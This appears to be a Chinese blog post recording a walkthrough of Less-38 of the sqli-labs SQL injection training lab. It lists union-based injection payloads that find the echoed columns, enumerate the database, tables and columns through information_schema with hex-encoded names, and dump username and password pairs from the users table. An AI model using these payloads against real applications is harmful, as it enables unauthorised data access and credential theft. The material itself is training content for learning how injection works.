sqli-labs-Less-38

SQLI-LAPS 实验记录

Less-38

这一关改又回到了Get注入方式,我们先按照之前的联合注入方法进行尝试。

在这里插入图片描述

首先我们输入Payload如下:

0' union select 1,2,3 --+

在这里插入图片描述

结果如图所示,可以看到页面成功返回信息,我们就可以在回显位进行修改,以查找对应的数据库名、表名、列名及其他数据。


后续查找数据库表名、列名及其他数据的Payload分别如下:

  • 查找数据库名:

    0' union select 1,database(),3 --+
    

    在这里插入图片描述

  • 查找表名:

    0' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479),3 --+
    

    这里还有一个重要的步骤,是将上一步查询出来的数据库名称:security,转换成16进制来表示,也就是table_schema=0x7365637572697479。

    在这里插入图片描述

  • 查找列名:

    0' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273),3 --+
    

    这里同样把上一步查询出来的表名:users,转换成16进制表示,即:table_name=0x7573657273。

    在这里插入图片描述

    查找其他数据:

    0' union select 1,(select concat(username,0x3a,password) from security.users where (id=1)),3 --+
    

    这里的0x3a表示":"。

    在这里插入图片描述

    这里如果想要查询其他的用户名与密码,可以修改where语句当中的id值,即id=2,3,4……

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

heze09

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值